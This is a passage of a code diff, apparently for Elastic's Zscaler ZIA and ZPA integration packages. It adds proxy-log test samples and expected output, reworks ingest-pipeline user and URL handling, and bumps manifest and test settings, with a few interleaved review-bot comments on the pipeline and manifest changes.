Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test 
DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Feb 16 05:33:45 2024","login":"test@example.com","proto":"SSL","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Allowed","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"8022","stime":"316","ctime":"316","urlclass":"Bandwidth Loss","urlsupercat":"User-defined","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown Dept","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"NA","respcode":"NA","eua":"Unknown","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Feb 16 05:29:00 2024","login":"test@example.com","proto":"SSL","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Allowed","appname":"Microsoft Teams","appclass":"Enterprise","reqsize":"297","respsize":"95429","stime":"249000","ctime":"249000","urlclass":"Bandwidth Loss","urlsupercat":"User-defined","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown Trans","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"NA","respcode":"NA","eua":"Unknown","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"NA","devicehostname":"NA"}} 
diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json index 8fe849de766..25bbff8a1a5 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json @@ -48,7 +48,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -73,6 +74,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -174,7 +176,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -199,6 +202,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -295,7 +299,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -320,6 +325,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -421,7 +427,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -446,6 +453,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -547,7 +555,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -573,6 +582,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -669,7 +679,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -695,6 +706,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" 
@@ -795,7 +807,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -821,6 +834,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" 
@@ -873,6 +887,481 @@ } } } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "blocked", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Dec 31 07:07:07 2021\",\"login\":\"test\",\"proto\":\"HTTPS\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Blocked\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"14135\",\"stime\":\"0\",\"ctime\":\"0\",\"urlclass\":\"Business Use\",\"urlsupercat\":\"Business and Economy\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"GET\",\"respcode\":\"NA\",\"eua\":\"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0\",\"ereferer\":\"None\",\"ruletype\":\"FwFilter\",\"rulelabel\":\"Access Blocked\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "method": "GET", + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 14135 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test" + ] + }, + "rule": { + "name": "Access Blocked", + "ruleset": "FwFilter" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": 
"https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "id": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Windows Microsoft Windows 10 Pro ZTunnel/1.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + } + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 0, + "department": "Unknown", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 0, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "Business and Economy" + }, + "class": "Business Use" + } + } + } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "blocked", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Dec 31 07:07:07 2021\",\"login\":\"test@example.com\",\"proto\":\"HTTPS\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Blocked\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"14135\",\"stime\":\"0\",\"ctime\":\"0\",\"urlclass\":\"Business Use\",\"urlsupercat\":\"Business and Economy\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test 
DB\",\"dept\":\"Unknown\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"GET\",\"respcode\":\"NA\",\"eua\":\"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0\",\"ereferer\":\"None\",\"ruletype\":\"FwFilter\",\"rulelabel\":\"Access Blocked\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "method": "GET", + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 14135 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "test@example.com" + ] + }, + "rule": { + "name": "Access Blocked", + "ruleset": "FwFilter" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Windows Microsoft Windows 10 Pro ZTunnel/1.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + } + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 0, + "department": "Unknown", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 0, + "threat": { + "name": 
"None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "Business and Economy" + }, + "class": "Business Use" + } + } + } + }, + { + "@timestamp": "2024-02-16T05:33:45.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "allowed", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Feb 16 05:33:45 2024\",\"login\":\"test@example.com\",\"proto\":\"SSL\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Allowed\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"8022\",\"stime\":\"316\",\"ctime\":\"316\",\"urlclass\":\"Bandwidth Loss\",\"urlsupercat\":\"User-defined\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown Dept\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"NA\",\"respcode\":\"NA\",\"eua\":\"Unknown\",\"ereferer\":\"None\",\"ruletype\":\"None\",\"rulelabel\":\"None\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"deviceowner\":\"administrator1\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 8022 + } + }, + "network": { + "protocol": "ssl" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "administrator1", + "test@example.com" + ] + }, + "rule": { + "name": "None", + "ruleset": "None" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": 
"www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": [ + "test", + "administrator1" + ] + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Unknown" + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 316, + "department": "Unknown Dept", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 316, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "User-defined" + }, + "class": "Bandwidth Loss" + } + } + } + }, + { + "@timestamp": "2024-02-16T05:29:00.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "allowed", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Feb 16 05:29:00 2024\",\"login\":\"test@example.com\",\"proto\":\"SSL\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Allowed\",\"appname\":\"Microsoft Teams\",\"appclass\":\"Enterprise\",\"reqsize\":\"297\",\"respsize\":\"95429\",\"stime\":\"249000\",\"ctime\":\"249000\",\"urlclass\":\"Bandwidth Loss\",\"urlsupercat\":\"User-defined\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown 
Trans\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"NA\",\"respcode\":\"NA\",\"eua\":\"Unknown\",\"ereferer\":\"None\",\"ruletype\":\"None\",\"rulelabel\":\"None\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "http": { + "request": { + "bytes": 297, + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 95429 + } + }, + "network": { + "protocol": "ssl" + }, + "related": { + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "test@example.com" + ] + }, + "rule": { + "name": "None", + "ruleset": "None" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Unknown" + }, + "zscaler_zia": { + "web": { + "app": { + "class": "Enterprise", + "name": "Microsoft Teams" + }, + "ctime": 249000, + "department": "Unknown Trans", + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 249000, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "User-defined" + }, + "class": "Bandwidth Loss" + } + } + } } ] } \ No newline at end of file 
diff --git a/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml
index c612cac691e..d0df2ee03b9 100644
--- a/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml
@@ -12,7 +12,6 @@ processors:
 - json:
 field: event.original
 target_field: resp
- ignore_failure: true
 - remove:
 field: json
 if: ctx.input?.type == 'http_endpoint'
@@ -95,7 +94,6 @@ processors:
 value: '{{{source.nat.ip}}}'
 if: ctx.source?.nat?.ip != null
 allow_duplicates: false
- ignore_failure: true
 - convert:
 field: json.sip
 target_field: destination.ip
@@ -112,7 +110,6 @@ processors:
 value: '{{{destination.ip}}}'
 if: ctx.destination?.ip != null
 allow_duplicates: false
- ignore_failure: true
 - convert:
 field: json.reqsize
 target_field: http.request.bytes
@@ -194,36 +191,40 @@ processors:
 }
 - uri_parts:
 field: json.url
+ if: ctx.json?.url != null && ctx.json.url != ''
 on_failure:
 - set:
 field: url.original
 value: '{{{json.eurl}}}'
- if: ctx.json?.eurl != null
- ignore_failure: true
+ if: ctx.json?.eurl != null && ctx.json.eurl != ''
 - set:
 field: url.full
 value: '{{{url.original}}}'
- ignore_failure: true
+ if: ctx.url?.original != null && ctx.url.original != ''
 - urldecode:
 field: url.original
 ignore_missing: true
- ignore_failure: true
+ if: ctx.url?.original != null && ctx.url.original != ''
 - urldecode:
 field: json.eua
 ignore_missing: true
- ignore_failure: true
+ if: ctx.json?.eua != null && ctx.json.eua != ''
 - user_agent:
 field: json.eua
+ if: ctx.json?.eua != null && ctx.json.eua != ''
 on_failure:
 - set:
 field: user_agent.original
 value: '{{{json.eua}}}'
- if: ctx.json?.eurl != null
- ignore_failure: true
+ if: ctx.json?.eua != null && ctx.json.eua != ''
 - rename:
 field: json.login
- target_field: user.email
+ target_field: user.id
 ignore_missing: true
+ - set:
+ field: user.email
+ copy_from: user.id
+ if: ctx.user?.id != null && ctx.user.id.contains('@')
 - dissect:
 if: ctx.user?.email != null && ctx.user.email.contains('@')
 field: user.email
@@ -233,7 +234,6 @@ processors:
 value: '{{{json.deviceowner}}}'
 if: ctx.json?.deviceowner != null
 allow_duplicates: false
- ignore_failure: true
 - foreach:
 field: user.name
 if: ctx.user?.name instanceof List
@@ -243,6 +243,16 @@ processors:
 value: '{{{_ingest._value}}}'
 allow_duplicates: false
 ignore_missing: true
+ - append:
+ field: related.user
+ value: '{{{user.name}}}'
+ allow_duplicates: false
+ if: ctx.user?.name != null && !(ctx.user.name instanceof List)
+ - append:
+ field: related.user
+ value: '{{{user.id}}}'
+ allow_duplicates: false
+ if: ctx.user?.id != null && ctx.user.id != ''
 - rename:
 field: json.action
 target_field: event.action
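Review bot: The new `set` that copies `user.id` into `user.email` guards only against null before calling `ctx.user.id.contains('@')`, so a `json.login` that arrives as a non-string would now throw inside the condition and, with `ignore_failure` removed throughout this pipeline, presumably land in the pipeline-level `on_failure` handler rather than being skipped. The file already tests types with `instanceof` for the `user.name` foreach, so `if: ctx.user?.id instanceof String && ctx.user.id.contains('@')` keeps the style and closes that gap. The intent behind the rename to `user.id` (raw login always kept in `user.id`, `user.email` derived only for `@`-shaped logins) is not recorded in the hunk; a comment above the `rename` along the lines of `# json.login may be a bare username or an email: keep it in user.id and derive user.email only when it looks like an address` would spare the next reader the archaeology. The `dissect` processor that follows starts in this hunk but its pattern is outside it.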
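Review bot: The first new `append` to `related.user` takes `user.name` whenever it is non-null and not a List, so an empty string or any other scalar type is appended, whereas the sibling `append` from `user.id` right below it also rejects `''`. Narrowing the condition to `if: ctx.user?.name instanceof String && ctx.user.name != ''` makes the two appends consistent and avoids rendering a non-string value through `{{{user.name}}}`. The enclosing processors list continues outside the hunk.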
@@ -349,7 +359,6 @@ processors:
 value: '{{{zscaler_zia.web.device.hostname}}}'
 if: ctx.zscaler_zia?.web?.device?.hostname != null
 allow_duplicates: false
- ignore_failure: true
 - rename:
 field: json.bwthrottle
 target_field: zscaler_zia.web.bandwidth_throttle
@@ -370,7 +379,6 @@ processors:
 value: '{{{source.ip}}}'
 if: ctx.source?.ip != null
 allow_duplicates: false
- ignore_failure: true
 - rename:
 field: json.ehost
 target_field: zscaler_zia.web.encoded_host
@@ -388,7 +396,6 @@ processors:
 value: '{{{file.hash.md5}}}'
 if: ctx.file?.hash?.md5 != null
 allow_duplicates: false
- ignore_failure: true
 - set:
 field: file.name
 value: '{{{json.filename}}}'
@@ -413,7 +420,6 @@ processors:
 value: '{{{destination.domain}}}'
 if: ctx.destination?.domain != null
 allow_duplicates: false
- ignore_failure: true
 - rename:
 field: json.fileclass
 target_field: zscaler_zia.web.file.class
@@ -499,7 +505,6 @@ processors:
 - remove:
 field: event.original
 if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
- ignore_failure: true
 ignore_missing: true
 on_failure:
 - set:
diff --git a/packages/zscaler_zia/manifest.yml b/packages/zscaler_zia/manifest.yml
index ecfe58714ac..9ff2e157ec1 100644
--- a/packages/zscaler_zia/manifest.yml
+++ b/packages/zscaler_zia/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: zscaler_zia
 title: Zscaler Internet Access
-version: "2.18.1"
+version: "2.19.0"
 description: Collect logs from Zscaler Internet Access (ZIA) with Elastic Agent.
 type: integration
 categories:
@@ -11,7 +11,7 @@ source:
 license: "Elastic-2.0"
 conditions:
 kibana:
- version: ^8.3.0
+ version: ^8.12.0
 elastic:
 subscription: "basic"
 screenshots:
@@ -117,12 +117,14 @@ policy_templates:
 description: The header to check for a specific value specified by `secret.value`.
 required: false
 show_user: false
+ secret: false
 - name: secret_value
 type: password
 title: Secret Value
 description: The secret stored in the header name specified by `secret.header`.
 required: false
 show_user: false
+ secret: true
 owner:
 github: elastic/security-service-integrations
 type: elastic
diff --git a/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml b/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml
index b74714a2d9c..82ddd16b3c8 100644
--- a/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml
+++ b/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml
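Review bot: The explicit `secret: false` on `secret_header` carries no comment, and next to `secret: true` on `secret_value` a reader may take it for an oversight rather than a decision that only the header value is sensitive; a one-line comment such as `# the header name is not sensitive; the credential lives in secret_value` beside it would record that. Marking the `type: password` var `secret_value` as `secret: true` is the right call, and as far as I know the `secret` key is what drives the `kibana.version: ^8.12.0` bump in this package's manifest earlier in the diff, which would be worth stating in the changelog entry. The `policy_templates` block this hunk edits starts outside it.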
@@ -1,32 +1,27 @@
 version: "2.3"
 services:
 zscaler-app-connector-status-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9015 -p=tcp /sample_logs/app_connector_status.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9015 -p=tcp /sample_logs/app_connector_status.log
 zscaler-zpa-audit-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9016 -p=tcp /sample_logs/audit.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9016 -p=tcp /sample_logs/audit.log
 zscaler-zpa-browser-access-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9017 -p=tcp /sample_logs/browser_access.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9017 -p=tcp /sample_logs/browser_access.log
 zscaler-zpa-user-activity-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9018 -p=tcp /sample_logs/user_activity.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9018 -p=tcp /sample_logs/user_activity.log
 zscaler-zpa-user-status-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9019 -p=tcp /sample_logs/user_status.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9019 -p=tcp /sample_logs/user_status.log
diff --git a/packages/zscaler_zpa/changelog.yml b/packages/zscaler_zpa/changelog.yml
index 4ab7a1566c5..f982a44377d 100644
--- a/packages/zscaler_zpa/changelog.yml
+++ b/packages/zscaler_zpa/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.17.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9404
 - version: "1.16.1"
 changes:
 - description: Changed owners
diff --git a/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml
index 4b7f186fad1..349c5b1b59b 100644
--- a/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml
+++ b/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_port: 9015
 preserve_original_event: true
+assert:
+ hit_count: 1
diff --git a/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml
index 9b04e983ed0..d1c93dca3e9 100644
--- a/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml
+++ b/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_port: 9016
 preserve_original_event: true
+assert:
+ hit_count: 1
diff --git a/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml
index 5f5f934c260..4b84ce8515c 100644
--- a/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml
+++ b/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_port: 9017
 preserve_original_event: true
+assert:
+ hit_count: 1
diff --git a/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml
index 1ea21cb02b5..e1895b635b3 100644
--- a/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml
+++ b/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_port: 9018
 preserve_original_event: true
+assert:
+ hit_count: 1
diff --git a/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml
index d3d22bb6383..d04bcf8ef68 100644
--- a/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml
+++ b/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml
@@ -6,3 +6,5 @@ data_stream:
 vars:
 listen_port: 9019
 preserve_original_event: true
+assert:
+ hit_count: 1
diff --git a/packages/zscaler_zpa/manifest.yml b/packages/zscaler_zpa/manifest.yml
index 018d397fd7a..e8334d439a1 100644
